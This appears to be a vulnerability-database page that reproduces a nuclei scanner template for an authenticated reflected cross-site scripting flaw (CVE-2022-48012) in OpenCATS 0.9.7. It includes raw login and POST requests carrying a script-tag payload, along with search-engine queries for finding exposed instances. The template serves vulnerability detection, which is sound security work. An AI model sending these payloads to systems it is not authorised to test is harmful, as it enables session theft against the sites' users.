Lucene search
K

OpenCATS 0.9.7 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

OpenCATS 0.9.7 Cross-Site Scripting vulnerability via settings componen

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-48012
27 Jan 202320:45
circl
CNNVD
Opencats 跨站脚本漏洞
27 Jan 202300:00
cnnvd
CVE
CVE-2022-48012
27 Jan 202300:00
cve
Cvelist
CVE-2022-48012
27 Jan 202300:00
cvelist
EUVD
EUVD-2022-50726
3 Oct 202520:07
euvd
NVD
CVE-2022-48012
27 Jan 202318:15
nvd
Prion
Cross site scripting
27 Jan 202318:15
prion
RedhatCVE
CVE-2022-48012
23 May 202500:27
redhatcve
Vulnrichment
CVE-2022-48012
27 Jan 202300:00
vulnrichment
id: CVE-2022-48012

info:
  name: OpenCATS 0.9.7 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities
    - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities/blob/main/Opencats-0.9.7-Reflected%20XSS%20in%20onChangeTag.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-48012
    cwe-id: CWE-79
    epss-score: 0.0137
    epss-percentile: 0.68529
    cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"opencats"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2022,xss,opencats,authenticated,vuln

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php?m=login&a=attemptLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tag_title=<script>alert(document.domain);</script>

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "opencats - Login")
          - contains(body_3, "<script>alert(document.domain);</script>")
        condition: and
# digest: 4a0a00473045022100b6e748d8e2413669cd8fb5320423b295eff018098698337dcffecb015936f38b0220551233d32b20f90100947fc2304119cc38482e1b2b0d7fbeec48e91584cd0014:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.0137
SSVC
18